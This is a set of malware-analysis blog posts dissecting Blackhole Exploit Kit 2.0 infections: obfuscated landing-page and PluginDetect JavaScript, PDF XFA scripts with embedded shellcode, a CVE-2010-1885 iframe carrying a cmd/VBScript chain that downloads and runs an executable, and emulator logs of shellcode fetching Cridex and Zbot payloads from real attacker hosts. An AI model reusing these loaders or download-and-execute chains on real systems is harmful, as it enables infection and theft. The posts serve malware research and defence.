[Microsoft XMLHTTP ActiveX] open('GET', 'x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm', False)
[Microsoft XMLHTTP ActiveX] send
[Microsoft XMLHTTP ActiveX] Fetching from URL x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm (method: GET)
[Adodb.Stream ActiveX] open
[Adodb.Stream ActiveX] Write
[Adodb.Stream ActiveX] SaveToFile (.//..//c175065・exe)
[Adodb.Stream ActiveX] Close
[Shell.Application ActiveX] ShellExecute command: .//..//c175065・exe
3. PDF Exploitation - Slight New Changes Detected.. We have good sample of this so we can say much. The PluginDetect look at your Adobe versions then drops pdf/exploit But slight changes found compared to prev. code, not using splx() anymore. Reason? Yes, to avoid detection, and that retarded idea works! The way this code detects the adobe version is as below (same as before..):
   PluginDetect.initScript();
   PluginDetect.getVersion(".");
   pdfver=PluginDetect.getVersion("AdobeReader");
Redirect you the download evil pdf url below (same as before..):
 function x(s)
 {
   d=[];
   for(i=O;i<s.length;i++)
   {
     k=(s.charCodeAt(i)-46).toString(16);
     if(k.length==1)k="O"+k;
     d.push(k);
   };
   return d.join("");
 }
 end_redirect=function()
 {
 };
 window.onbeforeunload=function()
or depends on the version go to NEW BHEK2 URL with evil IFRAME now;
   show_pdf2=function(src)
   {
     var pifr=document.createElement('IFRAME');
     pifr.setAttribute('width',1);
     pifr.setAttribute('height',1);
     pifr.setAttribute('src',src);
     document.body.appendChild(pifr)
   };
   show_pdf2(window.location+"?mkk="+x("ebOf8")+"&jiypmeg="+x("m")+"&eawqt=O337O3O2O737O6343433&ytejxs="+x(pdfver.join(".")));
 }
Which was reversed and runs as per below..

[iframe redirection] x.x.x.x/links/anybody_miss-knowing.php -> x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
Means the previous pdf version checking used in the BHEK 1.3.2(see below) part was gone, although the same PluginDetect code base is still in use! It is understandable since BHEK2 is using longer format url download w/more parameters.. It's an important evidence to show PluginDetect code was also started to be changed..
   Function spl3(){
  iF (pdFver「O」 > O && pdFver「O」 < 8){
    exec7 = O;
    show_pdF('./data/ap1.php?F=F4dFb')
  }
  else iF ((pdFver「O」 == 8) || (pdFver「O」 == 9 && pdFver「1」 <= 3)){
    exec7 = O;
    show_pdF('./data/ap2.php')
  }
  spl4()
*) There are at least 5 to 6 ways of dropping exploits via this evil plugin in the sample we grabbed only 3(three) infection traces are detected. The PDF Exploit Used (The Java Script part below is having new code..) Like described above it has 2(two) PDF exploit used in the logic of plugin detect, in this case both leads to both files with same logic (diff md5) This PDF has interesting way which wasn't used in previous PDF exploits.. The format is the same, contains three points: javaScript, exploit code & shellcode. Like per pasted below snips: (all code are neutralized/uninfected/useless code..) Exploits:
<<
 /Keywords(3d40401i3d3o3h4244253h463h3q441i…
1l1o1l1o1l1o1l1o1l1o1l1o1l1o1l161f3h463h3q441i443d…
1i463l3h473h42323h42433l3r3q1i443r2r44423l3q3j1c1d…
3d3n1d233o3r48333k3h3h253b2h1l1f4340423d49233o3r48…
3j1i3i423r3p2b3k3d422b3r3g3h1c3f1d234d423h4445423q…
3r3q143b3m1m1c3b2h1l1d4b3b2h1p251b1b233i3r421c3b2h…
292a2929292929292929292929292p29292929292929293548…
3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o…
Shellcode:
 /CreationDate(66,83,e4,fc,fc,85,…
,10,83,c3,05,ff,e3,68,6f,6e,00,00,68,75,…
,70,3a,2f,2f,36,39,2e,31,39,34,2e,31,39,…
>>
JavaScript:
<xfa:script contentType='application/x-javascript'>
with(event){
k=target["eva";+";l";];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.keywords;}
}
s="";
z=a;
for(i=0;i<;a.length;i+=2){
 s+=String.fromCharCode(parseInt(z.substr(i,2),28));}
k(s);
</xfa:script>
Note: I wrote in previous post about the javascript used in PDF like this one, but the logic of PDF/JS used was changed. Please be noted.. The last part of the shellcode was actually the url lead to the payload.. to be dropped in the users with the uri details below:
0x0184 /phttp://x.x.x.x/links/anybody_miss-knowing.php?cmpspxc=373402380a&jwk=03370302073706343433&ntzziqi=03&gbks=coi&swlmlswl=culvtnu
While the collection of these evil junks we analyzed are: PS: I made a mistake to loose PE payload unsaved by proxy operation, couldn't get the payload in the attempt I made afterward, was one time shot.. Sorry for not be able to analyze it.. List of VirusTotal of each unique sample w/initial AV detection ratio: FILENAME MD5 DETECT RATIO ------------------------------------------------------------------------ index.html 9f7ea93cfc911305084c16fb3aeb6517 (18 / 42) js.js 8c53450b115b26d4144eac9d5f11852e ( 0 / 43) anybody_miss-knowing.php 02746b26613d881314d84f3b51d1ad97 ( 3 / 42) acropdf.pdf b72c668b370cc7271094836ad6180d5e ( 8 / 43) acropdf2.pdf f78b18ac786199548e647d94da0555ad ( 8 / 43)
↑Conclusion:

New modification / changes in landing page obfuscated code and some recode in PluginDetect of BHEK2 was starting to be seen, the detection ratio of landing page is currently low for this reported case, so I guess they got what they want, at this moment.

Not a new stuff, but I add anyway, the landing page is being covered well by some steps of forwarder and not to be connected directly to the global link like spam, they currently use a simple redirector for it, which passing the correct parameter to the landing pages and only those redirector urls can be found in spam mails.

And, as per announced in everywhere, the payload download links generated from the BHEK2 landing page is changing to be longer, indeed, but as per written in (@kafeine) site, this findings contains more (3 or 4) parameters per request, not as per one or two long strings as per firstly mentioned elsewhere. See below snips(real case sample):

blah.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
blah.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn
blah.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm
Morever about those link is, if you have a lead, then be careful of it, since you may only got one chance to grab it. In dealing with BHEK2, better research those infectors by group rather than doing it alone. I lost my payload because of this reason..

Rerference: (The order is unsorted.. No reason..)

1. Contagio: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)
2. Malware don't need Coffee: Fast look at an infection by a Blackhole Exploit Kit 2.0
3. Trustwave SpiderLabs: Blackhole Exploit Kit v2
4. Malware don't need Coffee: Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel
5. XyliBox : Blackhole 2.0

Blackhole Previous Versions:

via Xylibox: v1.20, v1,21, v1.23 & Malware don't need Coffee: v.1.25

#MalwareMustDie!

Thursday, September 20, 2012

"Geek" Way in Reversing #CVE-2010-1885 Infection via PluginDetect Script/Blackhole EK (85.17.165.22)

Just finished handling local infection case today, behind this case is the beloved blackhole exploit kit. Some WinXP for some 3rd party software compatibility trouble can't install Microsoft's critical patch (MS10-042) properly, this patch is about the infamous (CVE-2010-1885) which is critical vulnerability in MPC::HexToNum function in helpctr.exe (a.k.a. hcp://URL flaw). And these clients accidentally opening a spam mail contains the BHEK infected url (some of you like to say it as "BHEK landing page"), downloading a payload which the installed antivirus software cannot even detect it yet.

That was just happened today and was really made my day. Since the flaw was fixed by microsoft in about 2years ago I never expect to see un-patched systems which still having this flaw, yet it does exist, bunch of it. Surprisingly, since there are some possibility of XP users are also having similar risk so I dare myself to write the reversing of this infection for your information on handling similar case.

The infectors was BHEK of in 85.17.165.22 , looks being up less than 24h 
with reports below here--->>[URL-QUERY-LINK]
The landing page is:  h00p://85.17.165.22/main.php?page=9adab93ef87c3421

And it has the below infection components:
/Gam.jar           EXPL: Java/2012-1723 (go to below explanation)
/data/field.swf    EXPL: SWF/Cve-2011-0611 ---> shellcode --> same payload
/data/ap1.php      EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/data/ap2.php      EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/w.php?f=f4dfb&e=1 EXPL: EXPL: Java/2012-1723 SAV: Gam.Jar --> Shellcode --> SAV: same payload
/w.php?f=f4dfb&e=2 EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload
/w.php?f=f4dfb&e=5 EXPL: CVE-2010-1885/HRC vulns SAV: %TEMP%\file.exe
↑see the last line closely, this is the case that I will describe here. If you deobfs the landing page well, you'll see BHEK plugin detect, just in case, you can see my neutralized deobfs code here: --->>[PASTEBIN] in the line 1790 you will see code like this
Function spl4(){
  try {
    For (var i = O, m; i < navigator・plugins・length; i ++ ){
      var name = navigator・plugins「i」.name;
      iF (name.indexOF('Media Player') !=- 1){
        m = document・createElement('IFRAM3');
        m.setAttribute('src', './data/hhcp.php?c=F4dFb');
        m.setAttribute('width', O);
        m.setAttribute('height', O);
        document・body「'appendChild'」(m)
      }
Which will lead you to the downloaded html file at:
h00p://85.17.165.22/data/hhcp.php?c=F4dFb
And this file will contain the other obfs code like this: eval can be decoded as per below pic, an iframe contains exploit and - also an execution arbitary command: The format of the malicious iframe is as per below:
<iframe src="xxxxx=<script defer>Run(yyyyy);</script>">
//legends:
xxxxx=CVE-2010-1885 PoC strings
yyyyy=executable aribary command
If you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see similarity: ↑here's the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205 Following, the "yyyyy" is combination of cmd and Windows (Visual Basic) Script commands:
cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\
 go・vbs&&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\
 go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\
 go・vbs&&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\
 go・vbs&&echo objHTTP・Send>>%TEMP%\
 go・vbs&&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\
 go・vbs&&echo Const adTypeBinary = 1 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\
 go・vbs&&echo oStream・type = adTypeBinary >>%TEMP%\
 go・vbs&&echo oStream・open >>%TEMP%\
 go・vbs&&echo oStream・write objHTTP・responseBody>>%TEMP%\
 go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\
 go・vbs&&echo oStream・close>>%TEMP%\
 go・vbs&&echo set oStream = nothing >>%TEMP%\
 go・vbs&&echo Set xml = Nothing >>%TEMP%\
 go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\
 go・vbs&&echo WshShell・Run FileName, 0, True >>%TEMP%\
 go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\
 go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\
 go・vbs|cscript %TEMP%\
 go・vbs>nul
(PS: the above code was neutralized and NOT malicious!)
↑Which means:
Download file from 85.17.165.22/w・php?f=f4dfb&e=5 & save it in %TEMP%\file.exe, via MSXML2・XMLHTTP stream, and then runs it via WshShell.Run and DELETE the saved file afterwards. (This was the reason I couldn't get the sample file from infected PC and I had to - extract it out of the memory manually)
The worse part is almost everyone miss this tiny obfuscated file- even in the Virus Total ONLY 3(three) products can detect it:
MD5: 5629b24e0faae7b42127df9f592fed48 File size: 5.2 KB ( 5326 bytes ) File name: hhcp.php@c=f4dfb File type: HTML Tags: html cve-2010-1885 exploit Detection: 3 / 43 Analysisdate:2012-09-19 19:36:44 UTC ( 1 時間, 7 分 ago ) URL: ------>>[VIRUS-TOTAL]
Furthermore the payload looks like this "Fake" Intel Logo: Which runs these both processes:
PID MEM        PATH                Event    
216 2007536674 %path%unknown.exe   Global\crypt32LogoffEvent //Stays as process
840 2088831062 %System%svchost.exe //Kicking off svchost
I don't have enough time to do deep analysis of this binary, so a quicky then.. Binary snapshot:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9    .....j...j...j..
0090   EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9    .I...j...j...j..
00A0   73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9    sJ...j...I...j..
00B0   82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9    .u...j..Rich.j..
00C0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00    ........PE..L...
00D0   A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01    .xWP............
Section:
   .text  0x44000(snipped)
   .rdata 0x45000 0x2d84 11776
   .data  0x48000 0xd38 3584
   .adata 0x49000 0x10 512
   .CRT   0x4b000 0x10 512 <--- cryptor pack
   .rsrc  0x4c000 0x1a18 7168 
Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown
Shortly, some suspicious calls detected while it stays in process.. Below is my adventure in reversing graph, the way it steals so many info - I guess is a variant of ZeuS Trojan or ZeuS/Zbot↓ In the mean time Virus Total can detect this as per below:
MD5: c559573fc5ab9862607e4fa4b2edfc04 File size: 294.0 KB ( 301056 bytes ) File name: unknown.exe File type: Win32 EXE Detection: 19 / 43 Analysis date: 2012-09-19 17:58:31 UTC ( 1 分 ago ) URL:---->>[VIRUS-TOTAL]
The current malware names are:
F-Secure                 : Trojan.Generic.KD.731435
Microsoft                : PWS:Win32/Zbot
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : Trojan.Gen
TrendMicro               : TROJ_GEN.R42CDII
McAfee-GW-Edition        : PWS-Zbot.vo!a
Fortinet                 : W32/Androm.DW!tr
TrendMicro-HouseCall     : TROJ_GEN.R42CDII
Avast                    : Win32:Trojan-gen
Ikarus                   : Trojan-Spy.Win32.Zbot
GData                    : Trojan.Generic.KD.731435
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.Generic.KD.731435
McAfee                   : PWS-Zbot.gen.ana
Panda                    : Trj/Genetic.gen
AhnLab-V3                : Spyware/Win32.Zbot
AntiVir                  : TR/Injector.air.1
Sophos                   : Mal/EncPk-AGK
Comodo                   : UnclassifiedMalware
The moral of the story is, do not under estimate "every" exploit implemented in the exploit kit. Those exploits are picked up well and are meant for a well-planned infection purpose, even the one you think has the smaller chance to infect. when it hits, you may get yourself an epidemic.

And, to malware analyser/researcher(etc), to understand how infection works by reversing the malicious+exploit code by yourself will change the way you think about handling malware in the future, trust me. You may continue to whatever automation system/tool you use, but at least, for one time, try to figure it out by your ownself! I won't sell you no crap.

#MalwareMustDie!

Tuesday, September 18, 2012

Monitoring a BlackHole Exploit Kit Services & Infectors (Target: 203.91.113.6)

Monitoring the activity of one blackhole (in short: BHEK) host means spending time on it for days. I picked one positive BHEK host in 203.91.113.6 & stick to it for about a week, this host is quite active as malware infectors, which one of the reason I picked it up.
I think I am careful enough in monitoring it, so I don't think they don't even sense to be monitored, which giving me much time to analyze it. Here's of what I found...
  
Background

The spam email contains malicious link to this host on Sept 5th was -
making me start to monitor this host. Maybe some of you still remember -
this spam:
From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time was varied)
Subject: Tax Refund Alert - Action Required
How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]
↑This spam actually infected users w/Cridex. At that time the domain used was gdeounitrg.com and gsigallery.net URLQuery data is also showing a long list of reported malware infectors coming from this host, you can access it here--->>[CLICK] By that list ↑we can see the recent infector domain as per below↓
virtual-geocaching.net
cedarbuiltok.net
thebummwrap.net
afgreenwich.net
bode-sales.net
cat-mails.net
centennialfield.net
blue-lotusgrove.net
dushare.net
If you see each report listed in↑URLQuery by date, you will know this host never use same domain more than 2 days(MAX). Since the url listed are landing page, I can assume email malvertising scheme. Services used: During the initial monitoring time I detected services as per below:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  open     msrpc
136/tcp  open     profile
137/tcp  open     netbios-ns
138/tcp  open     netbios-dgm
139/tcp  open     netbios-ssn
389/tcp  open     ldap
636/tcp  open     ldapssl
1025/tcp open     NFS-or-IIS
5000/tcp open     UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
Couple days ago I realized it filtered their previously opened ports /services, and added some more too, which looks like this now:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc <-----1
136/tcp  filtered profile <-----1
137/tcp  filtered netbios-ns <-----1
138/tcp  filtered netbios-dgm <----1
139/tcp  filtered netbios-ssn <-----1
389/tcp  open     ldap
445/tcp  filtered microsoft-ds <-----1
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd  <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy <---4
Legend:
= Windows services, it was never filtered previously
= nessus scanner daemon service
= squid proxy is running
= http web server
↑It filtered some tcp ports related to the windows services. To make sure this is still the same Windows server as before - I re-checked the OS fingerprint of it everyday:
Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW
What's with the web services used (port 80 and 8080) Let's see what happened in port 8080
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT
While this is what happened in port 80
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close
↑So in TCP/8080 we'll see a tomcat & ngnix in TCP/80. Now we see ngnix, apache, file sharing, telnet, ssh, and ftp server. The filtered ports are: nessus for portscanning, and squid proxy which I probed to be set outbound. I saw some of blackhole hosts, but never see a guarded one w/heavy services running like this, morever NFS & LDAP services are also running too which suggesting us a possibility of records or maybe a C&C activity on it. OK, let's continue with what this BHEK actually does now.. Infector scheme and malwares Consulting to my EK mentor @kafein who kindly guide me in EK infection cases, what looked like old version of BHEK (1.2.5), since there are some changes - it's possible being upgraded to lastest BHEK v2, so I use a tool on freebsd box to check the infector scheme. We picked the latest infector structure from urlQuery:
virtual-geocaching.net/main.php?page=7de3f5c4200c896e
..And this is what I fetched as samples: ↑all of these evil-mess is what user will get by clicking one infector url above. File details are as follows:
AcroPDF.PDF                    50583375d345fb7a294e26094601699a   18406
field.swf                      d41d8cd98f00b204e9800998ecf8427e       0
Gam.jar                        ab4af9072132f170024a9072e0288459   32171
main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3   69023
shellcode.sc                   ac157a90724aec74a1de6e0a20d4db0d     466
wpbt0.dll/e88d779.exe          3158bc97bf424fcd905caa22b29767b9  119143
While these are coming through below redirected urls of the infector:
/main.php?page=7de3f5c4200c896e <--JS/Obfs Infector
/Gam.jar   <----- exploit java CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php  <----PDF Malware Pdfka/EXP will shellcode
/w.php?f=80f39&e=1 <---- payload EXE (Troj/CRIDEX dropped by JS/HTML shellcode)
/w.php?f=80f39&e=2 <-----payload EXE (troj/CRIDEX dropped by PDF)
/data/hhcp.php?c=80f39  <----0 byte (link for SWF)
/data/field.swf <-- 0 byte supposed to be flash/shockwave
/w.php?f=80f39&e=4 <--- url dropped to PDF shellcode
↑The point of this scheme is to infect user with Trojan/Cridex The infector scheme is like follows: Landing page is HTML contains obfuscated JS/Code, neutralizedsample is here---->>[PASTEBIN] This code is deobfs'ed like this ---->>[PASTEBIN] There you can see the BHEK plugin detection code to exploit your browser via vulnerable sector, as per below route:
Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE)
PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE)
JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)
The above scheme was recorded in log at my freebsd box below:
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)



[Navigator URL Translation] Gam.jar -->  h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar

[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlh00p
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10


Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)






ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)

[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)



[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
About #shellcode, we found 2 shellcodes, one is the one coded in the landing page, and the other one is coded in PDF file, say, shellcode 1 & 2. The shellcode1 decoded:
BOOL VirtualProtectEx (
     HANDLE = 0x298dda60 => none;
     LPCVOID = 0x298dda70 => none;
     DWORD dwSize = 255;
     DWORD flNewProtect = 64;
     PDWORD lpflOldProtectt = 64;
) =  0x1;
HMODULE LoadLibraryA (
     LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dl used
) =  0x7df20000;
DWORD GetTempPathA (
     DWORD nBufferLength = 248;
     LPTSTR = 0x298ddb00 => 
           = "c:\tmp\";
) =  0x7;
HRESULT URLDownloadToFile ( //downloads...
     LPUNKNOWN = 0x28621a40 =>  none;
     LPCTSTR = 0x28621a48 => 
           = "h00p://virtual-geocaching.net/w.php?f=80f39&e=1";
     LPCTSTR = 0x298ddb50 => 
           = "c:\tmp\wpbt0.dll";  // saved here...
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0x0;
UINT WINAPI WinExec (       // execute it here..
     LPCSTR = 0x298ddb70 => 
           = "c:\tmp\wpbt0.dll";
     UINT uCmdShow = 0;
) =  0x20;
UINT WINAPI WinExec (
     LPCSTR = 0x298ddbb0 => 
           = "regsvr32 -s c:\tmp\wpbt0.dll"; //register it...
     UINT uCmdShow = 0;
) =  0x20;
BOOL TerminateThread (
     HANDLE hThread = -2;    // exit...
     DWORD dwExitCode = 0;
) =  0x0;
While the other one shellcode 2 is so similar to it with aiming different download url:
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
Means: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"
For PDF infector, Most scanner cannot detect below evil script written in it:
<xfa:script contentType='application/x-javascript'>
with(event){
e=target["eval"];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;}
}
a=a.split(".");
s="";
z=a;
for(i in a){
zz=i;
}
for(i=0;i<zz;i++){
 s+=String.fromCharCode(-33+1*z[i]);
}
e(""+s);
</xfa:script>
↑While the Subject object contains exploit & shellcode:
<</Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
  :
snip
  :
CreationDate(66;83;e4;fc;fc;85;e4; //shelcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;...blah
The payload itself is the PE file of Trojan/Cridex , which has the below analysis:
Sample's MD5 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed:  0 Actual:  130407
Packer: PureBasic 4.x -> Neil Hodgson 
Sections:
   .code 0x1000 0x24cf 9728
   .text 0x4000 0x23c8 9216
   .rdata 0x7000 0x10 512 
   .data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
